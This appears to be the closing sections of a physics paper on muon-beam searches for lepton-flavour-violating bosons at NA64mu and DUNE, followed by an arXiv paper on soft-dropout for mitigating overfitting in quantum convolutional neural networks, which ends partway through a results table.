resonance and DIS processes. Unlike the \(\phi\) boson decay, events with DIS or resonant meson production are accompanied with additional activity in the final state. Similarly to previous findings for NuTeV, after discriminating for low-multiplicity events with two muons, we found that these backgrounds could be completely suppressed in a MC simulation of 400 million events of neutrino interactions on an Argon target (corresponding to \(\sim 5\) years of operation of DUNE at the nominal intensity). However, further studies are planned with a full detector simulation to get a detailed understanding of the possible bounds on the background rejection. ## IV Results We illustrate the sensitivity potential for the benchmark CLFV scenario with the complementary muon beams at NA64\(\mu\) and DUNE in Fig 3. For both experiments, the double-differential cross-section in Eq. 9 or 10 is evaluated given the energy spectra of each experiment, \(\Phi_{\mu}(E)\), and the kinematical limits on the final-state \(\phi\)-boson fractional energy, \(x\), which is constrainted by the masses of the boson \(\phi\) and the \(\tau\). In the case of the NA64\(\mu\) experiment a total integrated muon flux of \(\sim 3\times 10^{13}\) MOT is achievable [20]. The time needed to accumulate the assumed total MOT is estimated to be \(\sim 100\) days. This conservative estimation is based on the CERN SPS delivering on average 3500 spills per day and \(2\times 10^{8}\) muons per spill. Benefiting from the unique combination of a 160-GeV muon beam with missing-energy and momentum search, NA64\(\mu\) would be able to perform a competitive search for such a CLFV signal. Furthermore, the sensitivity reach critically depends on the length of the active target. We find that a 1-m-long target would already be able to explore a large part of the parameter space, \(g_{V}\geq 6\times 10^{-3}\). However, the experiment is highly modular and a possible optimization of the setup could enhance its potential further: a feasible option is to increase the target length to 5 meters which would allow to completely cover the \((g_{\mu}-2)\) preferred region and to probe a variety of other new physics scenarios involving muons. We also find that already with a \(10^{12}\) MOT and a \(\sim 3\) m long target the \(g_{V}\geq\times 10^{-2}\) parameter region can be covered. A detailed Monte Carlo simulation of an optimized setup will follow as a next step. For the DUNE experiment the \(\phi\)-boson production is driven by the high-end tail of the muon flux. Compared to NA64\(\mu\), the lower muon energies at DUNE and thus lower production cross-section are compensated by the more intense muon flux. Assuming 20 years of operation at nominal intensity, DUNE would be able to explore a significant part of the parameter space, reaching into the \(g_{V}\simeq 10^{-2}\) region and potentially improving the constraints from NuTeV. However, an optimization of the neutrino beam line could further enhance the contribution of high-energy muons in the flux and subsequently approach the \(g_{V}\leq 10^{-2}\) benchmark region. This scenario is partially motivated by a recent work exploring an alternative beam-dump operation mode to probe new physics with DUNE [34]. For comparison we also show the projected sensitivity for the same \(\mu\)-on-target mode calculated by [14] for CHARM, NuTeV and SHiP. Here we do not show the constraints or projected sensitivity limits derived for the direct electroweak and heavy meson decay process, which was included in the previous work [14] since we only focus on the \(\mu\)-on-target scenario. In the case of SHiP, the assumed total data corresponds to \(2\times 10^{20}\) protons-on-target (POT). The worse sensitivity in DUNE compared to SHiP stems from the lower muon energies in the flux [35]. It is also noted that there are differences in the beam intensity between NA64\(\mu\) and SHiP. We assume a \(10^{12}\) POT per spill intensity at the CERN SPS in the case of the muon beam line used by NA64\(\mu\), while for SHiP the proton beam intensity is usually expected to be an order of magnitude higher. We note that a similar setup of NA64\(\mu\) is capable of searching for other new scalar particle candidates using the same muon beam [26]. In addition, the proposed Muon Missing Momentum (\(M^{3}\)) experiment at Fermilab [36] also plans to probe new physics with a dedicated muon beam. Finally, a number of experiments also have the potential to search for hidden-sector scalar particles, such as SHADOWS [37], HIKE [38], and ATLAS [39]. Figure 2: Energy spectrum of muons at the end of the decay pipe from the full DUNE neutrino beam line simulation [19], see explanation in the text. ## V Conclusions In summary, we present the sensitivity potential of two \(\mu\)-on-target experiments: NA64\(\mu\) and DUNE, as complementary modes of searching for new physics with muon beams. We find that both NA64\(\mu\) and DUNE have the potential to cover a significant portion of the benchmark model parameter space, \((m_{\phi},g_{V})\). NA64\(\mu\) with an optimized setup could probe the coupling parameter down to \(g_{V}\simeq 3\times 10^{-3}\), completely covering the muon \(g_{\mu}-2\) preferred region and thus providing a similar projected reach as SHiP. DUNE will also be able to cover unexplored parts of the parameter space, potentially improving on the obtained constraints from NuTeV. An optimization of the neutrino beam line, increasing the contribution from the high-energy tail, could allow to further enhance the sensitivity of DUNE. Although we use a given CLFV model as a benchmark in this work, we note that similar techniques can be used to study the sensitivity potential of experiments with muon beams to other physics scenarios. Beyond the \(g_{\mu}-2\) discrepancy and neutrino flavor oscillations, searches for Dark Sector particles are also motivated by the matter-antimatter asymmetry, the known Dark Matter abundance from astrophysical and cosmological observations, or by theoretical motivations strongly suggesting the existence of additional gauge groups weakly coupling to SM fields [1; 40]. ###### Acknowledgements. We gratefully acknowledge conversations with D. Harris. The work of LMB is supported by SNSF Grant No. 186158 (Switzerland), RyC-030551-I, and PID2021-123955NA-100 funded by MCIN/AEI/10.13039/501100011033/FEDER, UE (Spain).
2309.01829
A Post-Training Approach for Mitigating Overfitting in Quantum Convolutional Neural Networks
Quantum convolutional neural network (QCNN), an early application for quantum computers in the NISQ era, has been consistently proven successful as a machine learning (ML) algorithm for several tasks with significant accuracy. Derived from its classical counterpart, QCNN is prone to overfitting. Overfitting is a typical shortcoming of ML models that are trained too closely to the availed training dataset and perform relatively poorly on unseen datasets for a similar problem. In this work we study post-training approaches for mitigating overfitting in QCNNs. We find that a straightforward adaptation of a classical post-training method, known as neuron dropout, to the quantum setting leads to a significant and undesirable consequence: a substantial decrease in success probability of the QCNN. We argue that this effect exposes the crucial role of entanglement in QCNNs and the vulnerability of QCNNs to entanglement loss. Hence, we propose a parameter adaptation method as an alternative method. Our method is computationally efficient and is found to successfully handle overfitting in the test cases.
Aakash Ravindra Shinde, Charu Jain, Amir Kalev
2023-09-04T21:46:24Z
http://arxiv.org/abs/2309.01829v2
Soft-Dropout: A Practical Approach for Mitigating Overfitting in Quantum Convolutional Neural Networks ###### Abstract Quantum convolutional neural network (QCNN), an early application for quantum computers in the NISQ era, has been consistently proven successful as a machine learning (ML) algorithm for several tasks with significant accuracy. Derived from its classical counterpart, QCNN is prone to overfitting. Overfitting is a typical shortcoming of ML models that are trained too closely to the availed training dataset and perform relatively poorly on unseen datasets for a similar problem. In this work we study the adaptation of one of the most successful overfitting mitigation method, knows as the (post-training) dropout method, to the quantum setting. We find that a straightforward implementation of this method in the quantum setting leads to a significant and undesirable consequence: a substantial decrease in success probability of the QCNN. We argue that this effect exposes the crucial role of entanglement in QCNNs and the vulnerability of QCNNs to entanglement loss. To handle overfitting, we proposed a softer version of the dropout method. We find that the proposed method allows us to handle successfully overfitting in the test cases. ## I Introduction Quantum machine learning (QML) has shown great promise on several prototypes of NISQ devices, presenting significant accuracy over several different datasets, see e.g., [1; 2] and references therein. It has been proven effective even on a limited number of available qubits, not only on simulated devices but even when tested on noise-prone quantum information processing devices, as seemingly proven difficult in the case presented in [3]. As most of QML models have been derived from the classical machine learning (ML) models, with adaptations over the functioning being operable on quantum devices, these algorithms pose similar challenges as found in their classical counterparts. One of the setbacks of ML models, classical and quantum included, is overfitting, causing models to underperform on average when presented with external data outside the training set for the same problem. Due to its importance, the problem of overfitting has been studied extensively in the classical ML literature, and several methods have been proposed and implemented to mitigate it, see e.g., [4] and Sec. II for a brief overview. Very generally, there are two ways one can approach the problem of overfitting. In the first approach we combat overfitting before or during the training process. This can be done, for example, by data augmentation or regularization techniques [4]. Complementary to this approach, overfitting can be treated post-training by changing the trained parameters to compensate for overfitting. One such method for handling overfitting in neural networks (NN) architectures is neuron dropout [5]. In this method, a new NN is created from the trained NN by removing (dropping out) a few neurons from the network. Due to its simplicity and proven applicability in a wide range of NNs, dropout became one of the most popular techniques to handle overfitting in the classical ML paradigm. While pre-training methods can be effective to a certain extent, they may not fully eliminate the problem of overfitting since during the training, the model may potentially learn patterns that are specific to that data and may not generalize well. In contrast, post-training methods generally allow for a more comprehensive analysis of the trained model's behavior and performance, resulting in fine-tuning the models and improving generalization. In contrast to the classical setting, there has been much less investigation as to how to address the problem of overfitting in QML models. While pre-training methods such as data augmentation or early stopping may have been implemented in the QML setting, to the best of our knowledge there has been no systematic study of the problem of overfitting in QML models. In this paper, we study the problem of overfitting in QML models and propose a post-training method to mitigate it. Specifically, we focus on the dropout method as a deterrent for overfitting and for concreteness, and since it is one of the widely-used QML architectures, we concentrate on quantum convolutional neural networks (QCNNs) [6]. As we discuss in more detail in the following sections, we find that a straightforward generalization of the dropout method to the quantum setting can cause QCNN models to lose their prediction capabilities on the _trained_ data, let alone improving overfitting. As we shall argue, this result can be traced back to the way QCNNs are designed and to the crucial role of entanglement in their performance and success. Therefore, we propose a new method that is based on a "softer" version of the post-training dropout method termed soft-dropout, an overfitting deterrent. This method, as we will show, provides excellent performance for suppressing overfitting in QCNN for the tested cases. The paper is organized as follows: In Sec. II, we discuss the problem of overfitting and the classical techniques for mitigating it. In Sec. III we present the various techniques we tested and developed to mitigate overfitting in QCNNs. In Sec. IV we present our numerical experimental results using these techniques. We offer conclusions and outlook in Sec. V. ## II Overfitting and its mitigation in classical neural networks Before considering the problem of overfitting in the quantum setting, in the following section, we take a closer look at this problem as it is manifested in the classical setting and the current methods for mitigating it [4]. Overfitting is one of the common problems noticed in ML and statistical modeling, where a model performs exceptionally well on the training data but needs to be generalized to new, unseen data. It occurs when the model learns the noise and random fluctuations in the training data in addition to the underlying patterns and relationships. When a model overfits the training data, it becomes too complex and captures the idiosyncrasies of the training data, leading to poor performance on any new data. In practice, overfitting is manifested as a relatively poor performance of a model, in terms of its prediction accuracy, on validation data. Therefore, model overfitting is a problem that undermines the very essence of the learning task, i.e., generalizability. For this reason, a lot of efforts have been devoted to developing methods and techniques to handle overfitting and make sure that learning models are flexible enough and not overfitted to the training data. We briefly review some of the most popular techniques in what follows, see also [4] and references therein. Cross-validation is a pre-training technique used to assess the performance and robustness of a model. It involves splitting the data into multiple subsets or folds and training the model on different combinations of these subsets. By evaluating the model's performance on different folds, cross-validation helps estimate the model's ability to generalize to new data. It can be easily implemented in classical as well as quantum ML models (we have implemented it in our numerical experiments). Increasing the training data size by augmenting it can also help alleviate overfitting. Data augmentation techniques involve generating additional training samples by applying transformations, such as rotations, translations, or distortions, to the existing data. This introduces more variation and diversity, helping the model to generalize better. This method of avoiding overfitting is highly dependent on the availability of data and is easily transferable to QML since it is not related to the ML aspect but the data prepossessing part and is considered during the experimental process. Regularization is another popular pre-training overfitting prevention technique. In general terms, it avoids overfitting by adding a penalty term to the loss function during training. In this way, regularization introduces a bias into the model, discouraging overly complex solutions. \(L1\) and \(L2\) regularization are commonly used methods. \(L1\) regularization (Lasso) adds the absolute value of the coefficients to the loss function, promoting sparsity. \(L2\) regularization (Ridge) adds the squared value of the coefficients, which tends to distribute the impact across all features. Overfitting can occur when the model has access to many irrelevant or redundant features. Feature selection techniques aim to identify and retain only the most informative and relevant features for model training. This can be done through statistical methods, such as univariate feature selection or recursive feature elimination, or using domain knowledge and expert intuition. Feature selection has been implemented in the QML setting and has proven to be useful [7]. In addition to the aforementioned methods, the complexity of a model plays a crucial role in determining the risk of overfitting. Simplifying the model architecture or reducing the number of parameters can mitigate overfitting. Techniques such as reducing the number of hidden layers, decreasing the number of neurons, or using simpler model architectures, like linear models or decision trees, can help control the complexity and prevent overfitting. Finally, we mention dropout. Dropout is a regularization technique specific to NNs. It is one of the most popular methods for mitigating overfitting in classical NNs due to its simplicity and performance [4; 5]. Dropout can be implemented in two ways: one is during the training process, and another method would be after getting a trained model. During training, dropout randomly disables a fraction of the neurons in each layer, forcing the network to learn redundant representations and reducing the reliance on specific neurons. For post-training methods of dropout, typically a few percent of neurons are dropped at random from a trained NN. This process is repeated, with different realization, until the least overfitted model is found. The dropout method is known to help to prevent overfitting by making the network more globally robust and less sensitive to individual neurons [5]. In this work, we adjust the dropout method to the QCNNs' setting and experimentally test it. We find that due to quantum entanglement, the dropout method does not carry over in its simple form to the quantum setting. Rather, we propose a softer version of dropout, as we describe in the next section. We found that the soft-dropout method performs very well in mitigating overfitting in several QCNN numerical experiments. The reason for proposing a post-training method for a QCNN model is as a prevention technique to tackle overfitting even after all previous measures are considered prior to training the model and overfitting is still observed. ## III Methods and techniques Before presenting the results from our numerical experiments, we devote this section to providing an overview of the main tools and techniques we used and developed in this work. ### The QCNN architecture QCNNs are essentially variational quantum algorithms [6; 8]. Similar to their classical counterparts, QCNN is designed and used for solving classification problems (supervised and unsupervised paradigms have been studied in this context) [9]. They were proposed to be well-fitted for NISQ computing due to their intrinsically shallow circuit depth. It was shown that due to unique quantum phenomena, such as superposition and entanglement, QCNN can provide better prediction statistics using less training data than classical ones in certain circumstances [10]. Due to the noise and technical challenges of building quantum hardware, the size of quantum circuits that can be reliably executed on NISQ devices is limited. Thus, the encoding schemes for high dimensional data usually require a number of qubits that are beyond the current capabilities of quantum devices. Therefore, classical dimensionality reduction techniques are particularly useful in the near-term application of QML techniques. In this work, the classical data was pre-processed using two dimensionality reduction techniques, namely Principal Component Analysis (PCA) [11] and Autoencoding (AutoEnc) [12]. Autoencoders are capable of modeling complex non-linear functions, whereas PCA is a simpler linear transformation that helps in cheaper and faster computation. A generic QCNN is composed of a few key components [6; 8], as illustrated in Fig. 1. The first component is data encoding, also known as a quantum feature map. In classical ML, feature maps are used to transform input data into higher-dimensional spaces, where the data can be more easily separated or classified. Similarly, a quantum feature map transforms classical data into a quantum state representation. The main idea is to encode the classical data as an entangled state with the possibility of capturing richer and more complex patterns within the data. The quantum feature map is done in practice by applying a unitary transformation to the initial state (typically the all-zero state). In this work, we implemented two of the main feature encoding schemes, amplitude encoding and qubit encoding [6; 8]. In the former, classical data \((x_{1},\ldots,x_{k})\in\mathrm{R}^{k}\) is represented as, generally, an entangled input quantum state \(\ket{\psi_{\mathrm{in}}}\sim\sum_{i=1}^{k}x_{i}\ket{i}\) (up to normalization), where \(\ket{i}\) is a computational basis ket. Amplitude encoding uses a circuit depth of size \(\mathcal{O}(\log N)\) circuit and \(N\) qubits [13]. To evaluate the robustness of our dropout method with respect to the feature map, we also used qubit encoding. In this method the input state is a separable state \(\ket{\psi_{\mathrm{in}}}=\bigotimes_{i=1}^{k}(\cos\frac{x_{i}}{2}|0\rangle+ \sin\frac{x_{i}}{2}|1\rangle)\). As such, it uses a constant-depth circuit given by a product of a single-qubit rotation. The second key component of a QCNN is a parameterized quantum circuit (PQC) [14; 15]. PQCs are composed of quantum gates whose action is determined by the value of a set of parameters. Using a variational algorithm (classical or quantum), the PQC is trained by optimizing the parameters of the gates to yield the highest accuracy in solving the ML task (e.g., classification) on the input data. Typically, in QCNN architectures, the PQC is composed of a repeated sequence of a (parametric) convolution circuit followed by and a (parametric) pooling circuit. The convolution layer is used as the PQC for training a tree tensor network (TTN) [16]. In this work, we used a specific form of the convolution layer, which was proposed and implemented by Hur _et al._[8], and that is constructed out of a concatenation of two-qubit gates (building blocks). In Fig. 2(a)-(b) we sketch two of the building blocks that we used for convolution layer in our architecture. The convolution layer is followed by a pooling layer, which reduces the dimensionality of the input data while preserving important features, i.e., the pooling layer applies parameterized (controlled) quantum gates on the sequence of two qubits. To reduce the dimensionality, the control qubits are traced out (assuming they maintain coherence through the computation) while the target qubits continue to the next convolution layer, see Fig. 1. For the implementation of the pooling layer, we used a parameterized two-qubit circuit that consisting of two controlled rotations \(R_{z}(\theta_{1})\) and \(R_{x}(\theta_{2})\), respectively, each activated when the control qubit is 1 or 0 (filled and open circle in Fig. 2(c)). The PQC is followed by a measurement in the computational basis on the last layer of qubits. Training the QCNN is obtained by successively optimizing the PQC using the input data and their labels by minimizing an appropriate cost function. Here we use the mean squared error (MSE) between predictions and class labels. Given a set of training data \(\{\ket{\psi_{i}},y_{i}\}\) of size \(K\), where \(\ket{\psi_{i}}\) denotes an initial state and \(y_{i}\in\{0,1\}\) denotes their label, the MSE cost function is given by \[C(\mathbf{\theta})=\frac{1}{K}\sum_{i=1}^{K}\Big{(}y_{i}-f_{\mathbf{\theta}}(\ket{\psi _{i}})\Big{)}^{2}. \tag{1}\] Here, \(f_{\mathbf{\theta}}(\ket{\psi_{i}})\) is the output of QCNN (\(f\in\{0,1\}\)) which depends on the set of parameters \(\mathbf{\theta}\) that define the gates of the PQC. ### Dropout Once the models had been trained, we tested two dropout approaches to mitigate overfitting: a straightforward generalization of the classical dropout method and a'softer' approach. In the classical setting, post-training dropout is usually implemented by removing a certain percentage of neurons from the network. In a similar vein, in our first approach, we dropped a certain percentage of single-qubit gates (equivalently, replacing a gate with the identity gate) from the trained network. None of the CNOT gates in the convolution layers or the controlled two-qubit gates in the pooling layers were dropped out. As discussed in length in Sec. IV, we found that this dropout method fails catastrophically. Not only did it not help with mitigating overfitting, it substantially reduced the success rates on the _trained_ data. The second method we implement to mitigate overfitting in QCNNs we termed soft-dropout. Since setting (random, single-qubit) gates to the identity seemed to have a crucial effect on the network's performance, we hypothesized that tinkering with the trained parameters to a certain degree might provide enough flexibility to the model without hampering its accuracy and predicting capability. In the soft-dropout method, rather than dropping out gates completely, some of the trained parameters are slightly modified. The performance of the slightly modified model was then tested using testing and validation data. The process of changing the trained parameters was done manually to study the effect of the soft-dropout method and the threshold at which the changing parameter falters. We envision the soft-dropout not as a single technique to deter overfitting but as several collections of techniques that can be utilized individually or in combination. Soft-dropout may consist of techniques such as rounding the trained parameters up to certain decimal places, asserting certain values up to a threshold to a common whole number, and setting certain values close to zero, considering their proximity to the number. For the technique of setting values to zero, all the trained parameter values in the list of parameters below a certain floating number value (generally ranging below \(|\pm 0.09|\)) were changed to float value 0 by taking the absolute of all the parameters to cover all the values from the positive and negative spectrum of trained parameters. A similar technique was utilized in the case of threshold whole number conversion instead of setting it up to zero; the threshold depended on the point of mitigating overfitting without loss in accuracy dropping, which was found over several manual iterations of finding Figure 1: **General QCNN architecture**. The QCNN includes three key components: A feature map, a parametric quantum circuit that includes concatenated convolution and pooling layers, and a measurement followed by an optimization unit. In this work the convolution and the pooling layers are constructed from two-qubit gates (building blocks). Examples of the building blocks we used are given in Fig. 2. Figure 2: **Two-qubit building blocks of the implemented QCNN.** We used the architecture proposed and implemented in [8]. The building blocks for the convolution layers are given in subfigure (a) and (b) where \(U_{3}(\theta,\varphi,\lambda)=R_{x}(\varphi)R_{x}(-\frac{\pi}{2})R_{x}(\theta) R_{x}(\frac{\pi}{2})R_{z}(\lambda)\), while the building block for the pooling layer is shown in subfigure (c). the least testing-validation accuracy value and not losing the actual testing value significantly. For the round-off method, a built-in Python function for rounding up values up to certain decimal places was used, while not all values were rounded up to certain decimal places as after a certain threshold, a severe drop in accuracy was observed. The threshold for the round-off method was determined by iterating the method until finding the parameters that yield the highest validation accuracy compared to the unmitigated circuit. Results and observations of the soft-dropout method are discussed for all the datasets in Sec. IV. ## IV Numerical experiments and results ### Datasets Using multiple datasets in ML, including QML, is very useful to increase generalization, robustness, and reliability. It also helps overcome data limitations, introduces variability and heterogeneity, and allows the exploration of different perspectives. In regards to these ideas, we chose to work with three datasets, two of them being image-based medical datasets, Medical MNIST [17] and BraTS [18], while the third was a Stellar dataset [19] consisting of numerical values. Each dataset was split into three parts: one for training, another for testing, and the last portion for validation. The validation set is used to test the performance of the (trained) QCNN on an unseen dataset and provide a proxy for determining if the model exhibits overfitting and how well we mitigate this problem. Many variations of percentage split were implemented to find the best option for creating the overfitting conditions. This operation was performed for all three datasets. Later, after the split, the testing data was added to the training data to develop the overfitting conditions more prominently. Subsequently, the data were processed using PCA for dimensionality reduction and fitting it to the limited number of qubits (we used 8, 12, and 12 qubits). The classically-processed data was then sent for training on a (simulated) QCNN. _Medical MNIST._-- The Medical MNIST dataset consists of 6 classes: Abdominal CT, Breast MRI, Chest CT, Chest X-ray, Hand X-ray, and Head CT. These classes contained around 10000 images, each of size \(64\times 64\) pixels. As we are trying to implement binary classification, all possible permutations of classes were tested, and the similarity between Chest CT and Abdominal CT was considered most of the time. Several QCNNs were created to differentiate between the CT images being a Chest CT image or an Abdominal CT image. These two classes were pretty much alike and, hence, challenging to differentiate and were prone to overfitting, see Fig. 3. _BraTS 2019._-- To validate the uniformity of the proposed dropout approach on different datasets and models, we used another medical dataset for this implementation. The BraTS 2019 dataset was chosen for classification between High-Grade Gliomas (HGG) and Low-Grade Gliomas (LGG) patient MRI images. The BraTS 2019 training dataset has 259 HGG and 76 LGG images. The BraTS multimodal scans are provided in NIfTI file format (.nii.gz) and include the following components: a) native (T1) scans, b) post-contrast T1-weighted (T1Gd) scans, c) T2-weighted (T2) scans, and d) T2 Fluid Attenuated Inversion Recovery (T2-FLAIR) scans. These scans were obtained using diverse clinical protocols and a variety of scanners from a total of 19 different institutions. Due to resource limitations, only one modality, specifically the T2-FLAIR, was considered for the classification of HGG versus LGG. The images were resized to 64 pixels. As depicted in Fig. 4, the resulting images appeared unclear and pixelated, which was expected given the constraints. Figure 4: **Example of BraTS 2019 dataset brain images** The high-resolution brain images at the top row were resized to 64 pixels, bottom row. The resulting images appeared unclear and pixelated which pose a challenge for classification. Figure 3: **Example of Medical MNIST dataset images.** Top row: Abdominal CT, bottom row: Chest CT. The similarity between Chest CT and Abdominal CT images implies that they would be hard to classify and in addition, that the learning model may be prone to overfitting. _Stellar classification dataset (SDSS17)._-- As both of the prior datasets were image-based, we consider using a dataset in a different format to verify the conclusions devised and ascertain our claims derived from the results. The stellar classification dataset SDSS17 seemingly proved to be a reliable candidate. It consists of 100,000 observations of space taken from the Sloan Digital Sky Survey (SDSS). Every recorded observation was registered in 17 columns defining different values, such as the ultraviolet filter in the photometric system, the green filter in the photometric system, the redshift value based on the increase in wavelength, etc., and one class column identifying the category for being a star, quasar or a galaxy. Out of the 17 available columns, only 8 were used for training the model after the initial data pre-processing (columns containing the ID of equipment and date parameters were removed in order to generalize the object regardless of its position in the sky and the equipment detecting it). Considering the close proximity of the star and quasar data and their difficulty in classifying based on the data available, we considered classifying these two classes using QCNN. As the data consisted of only 8 columns, PCA did not need to be applied to reduce the dimensionality of the data. Hence, all the experiments conducted for the classification of this dataset were limited to 8 qubits. The same process of data splitting was utilized as defined for the previous dataset with few exceptions for the train-test-validation split percentage in order to characterize the overfitting scenario. ### Results from numerical experiments All the experimental data generated for this manuscript was generated using the Pennylene software (v0.31) and simulated on a local classical device, considering the total amount of iteration needed to train the QML model and the queuing operations required to complete the process on any of the available quantum computers on the cloud. For optimization purposes, we utilized the Pennylene optimizer Nesterov Momentum Optimizer, considering its merits observed during the initial training of the QML models [20]. The total number of qubits used for this experimentation varied from 8-16 depending upon the dataset used and the complexity of the circuit. PCA, as previously mentioned in Sec. III, was utilized for converting higher dimensionality data onto the number of qubits defined for the QML model. We verify success in mitigating overfitting in our experiment by two metrics: (1) increasing validation accuracy and (2) reducing the difference between testing and validation accuracy after implementing the dropout method. #### iv.2.1 Mitigating overfitting using dropout The first method we implemented to mitigate overfitting in QCNN is a direct adaptation of (post-training) dropout to the quantum setting, as discussed above. We have applied this method to mitigate overfitting when considering the Medical MNIST dataset. We found that this method has devastating effects on the tested QCNNs. For example, when we implemented this method on an 8-qubit model with a testing accuracy of 95% and validation accuracy of 90%, by dropping out only 5% of the single-qubit gates, the accuracy of the QCNN on the testing data was reduced significantly with 77% accuracy being one of the best-performing models and about 2% being the worst-performing. Not only was this method not able to mitigate overfitting by increasing validation accuracy or reducing the gap between the testing and validation accuracy, but it also resulted in dramatically hampering the performance of the network on the _trained_ data. Similar behavior was observed to be robust with respect to the number of single-qubit gates that were dropped out. Particularly, we tested dropping out 1% to 10% of the single-qubit gates and observed a similar drastic drop in performance accuracy. This was contrary to our naive intuition that a network with many gates, more than the minimum required to accomplish the learning task, should be minimally affected, if at all, by dropping out a few single-qubit gates. To test the effect of the method at its limit, we implemented it by dropping out one (randomly chosen) single-qubit gate out of a model with 78 gates. This experiment resulted in very interesting results. In these cases, the accuracy was plunged to a range of about 46% to 53%, which is almost \(50-50\) chance in the particular model we have tested. This experimentation bore the conclusion that even deleting a single gate from the circuit of a trained QCNN causes a loss of information gained during the training process. We hypothesize that entanglement plays a crucial role in this behavior. In classical CNN, where the dropout method is used very successfully, each neuron holds a few bits of information regarding the data it is trained on, and therefore, losing a small fraction of neurons does not affect the overall performance of the entire network. In stark contrast, QCNN is designed to harness entanglement between qubits in our implementation through the concatenation of single-qubit (parameterized) gates and CNOT gates. This means that the information learned about a certain dataset is stored and distributed in the QCNN in a "non-local" way, loosely speaking. Our experiments show that entanglement can be a double-edged sword in quantum NNs: On one hand, it may promote speedup, e.g., in terms of learning rates, but on the other hand, it can lead to a fragile NN, in the sense that removing even a single gate from a _trained_ network may have devastating consequences with respect to its performance. This experiment, therefore, exposes an intrinsic vulnerability of QML, and QCNNs in particular, in comparison to their classical counterpart. To ascertain the conclusion, we have conducted a set of experiments, schematically shown in Fig. 5. We have constructed a QCNN with 8 qubits and an additional ancillary qubit that does not pass through the feature map but rather is initialized in a computational state (say, \(|0\rangle\)) as a non-featured attestation to the QCNN circuit. Thus, this qubit does not hold any information about the input data. The ancillary qubit is then passed through a parameterized single-qubit gate (our experiments were done with an \(R_{x}\) gate and a \(R_{y}\) gate) whose parameters are consistently updated in every iteration of the training cycle along with the rest of the training parameters in the first convolutional layer. The qubit is then entangled with one of the qubits from the circuit with a CNOT gate after the first convolutional layer, and then it is traced out in the following pooling layer. Training this QCNN resulted in 93%-95% testing accuracy (depending on the network building blocks we used). However, by dropping out the parameterized gate of the ancillary qubit, the testing accuracy plunged to order of a few percents. This set of experiments clearly indicates that even though the ancillary qubit was not encoding information about the input data, the mere fact that it is trained and entangled with the rest of the qubits, dropping after training, caused an information loss that resulted in a sharp accuracy drop. These results suggested that while dropping out gates in QCNN may not be a viable method for mitigating overfitting, tinkering with the trained values of the gates parameters may have a more subtle effect and thus can be used for this purpose. #### iv.2.2 Mitigating overfitting using soft-dropout As we discussed above, applying the classically derived method for post-trained dropout resulted in the loss of learned information due dropping of gates. In contrast, encouraging positive results were observed when the soft-dropout method was applied. In these experiments we implemented the method by variations of rounding of the learned parameters and introducing a threshold on the values of the parameters, as prior mentioned in Sec. III. We summarize our results in Tables 1-3, with respect to the datasets they are associated with. The results clearly indicate that when a model suffers from overfitting (as captured by the lower validation accuracy and also an appreciable difference between test accuracy and validation accuracy), the soft-dropout method not only was successful in reducing the gap between testing and validation accuracy in several test cases, but also helped to increase the model validation accuracy across all of our experiments. We attempted to devise a systematic way to determine the threshold for rounding up to a number or an absolute value that could be decided for mitigating overfitting after obtaining the trained parameters. Utilizing this method on several trained and overfitted models, we observed that every model had a different threshold which could only be determined after constant testing to find the best fit for tackling the overfitting issue. In addition, a closer observation revealed that the set of parameters which were used to successfully mitigate overfitting were those which fluctuated around a mean value and did not changed much during training. This observation will be explored in more detail in future work. ## V Conclusion and Outlook In this study we focus on addressing the challenge of overfitting in QML setting, specifically, in QCNNs. Overfitting, a common issue in ML models, poses significant obstacles to the generalization performance of QCNNs. To overcome this challenge, we introduced and explored the potential of soft-dropout and compares it to a straightforward application of the dropout method commonly utilized in classical CNNs. Surprisingly, we found that dropping out even a single parameterized gate from a trained QCNN can results in a dramatic decrease in its performance. This result high Figure 5: **Ancillary qubit dropout experimental setup. The figure depicts the experimental setup used to exemplify the vulnerability of QML models. (a) The QCNN is trained along with an ancillary qubit, which is not part of the feature map. The ancilla qubit takes part in the training via a parameterized rotation (\(R_{x}\) or \(R_{y}\)). We found that this setup results in a testing accuracy of about 95%. (b) After training is completed, removing the single-qubit gate from the ancillary qubit, the model experienced a significant loss in prediction accuracy.** lights a vulnerability of QCNNs compared to their classical counterparts. On the other hand the soft-dropout approach resulted in encouraging results. Extensive experimentation is conducted on diverse datasets, including Medical MNIST, BraTS, and Stellar Classification, to evaluate the effectiveness of soft-dropout in mitigating overfitting in QCNNs. Our findings highlight the promising performance of soft-dropout in reducing overfitting and enhancing the generalization capabilities of QCNN models. By fine-tuning the trained parameters through various techniques, notable improvements in accuracy are observed while preserving the integrity of the quantum circuit. Hence, soft-dropout can be considered one of the most viable options to mitigate overfitting in a post-training setting. We close this section with a few directions for future work. The first direction is developing a systematic approach for determining which, and how, parameters should be tinkered to handle overfitting. Following our initial observation, we believe that identifying those parameters that fluctuate around a mean value during training play an important role for mitigating overfitting. Another important direction for future work is to investigate the performance of soft-dropout in the presence of experimental noise. Quantum systems are inherently susceptible to noise, which can impact the reliability and effectiveness of quantum operations. Understanding how soft-dropout performs under noisy conditions will contribute to the development of robust QCNN models that can operate in realistic quantum computing environments. Another aspect that requires further exploration is \begin{table} \begin{tabular}{c c c} \multicolumn{3}{c}{8 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.8728 & 0.8548 & 0.018 \\ 0.8765 & 0.8829 & -0.0064 \\ 0.8543 & 0.8499 & 0.0044 \\ 0.8655 & 0.8757 & 0.0102 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{12 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.8958 & 0.8859 & 0.01 \\ 0.8996 & 0.9082 & -0.0086 \\ 0.8666 & 0.8645 & 0.0021 \\ 0.8731 & 0.8793 & 0.0062 \\ \hline \end{tabular} \begin{tabular}{c c c} \multicolumn{3}{c}{16 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.9422 & 0.9257 & 0.0165 \\ 0.9518 & 0.9586 & -0.0068 \\ 0.8972 & 0.8895 & 0.0077 \\ 0.9127 & 0.9233 & 0.0106 \\ \hline \end{tabular} \end{table} Table 2: **Results based on BraTS dataset.** The format of results is similar to Table 1. for different models that were trained with qubits 8, 12 and 16. For all three numbers of qubits (8, 12, and 16), the validation accuracy after soft-dropout was implemented is higher than without dropout. This suggests that soft-dropout regularization technique helps improve the model’s generalization performance and reduces overfitting. \begin{table} \begin{tabular}{c c c} \multicolumn{3}{c}{8 qubits} \\ \hline **Test Acc. Validation Acc.** & **Gap** \\ \hline 0.9154 & 0.7175 & 0.1979 \\ 0.9229 & 0.8629 & 0.06 \\ \hline 0.9721 & 0.9136 & 0.0585 \\ 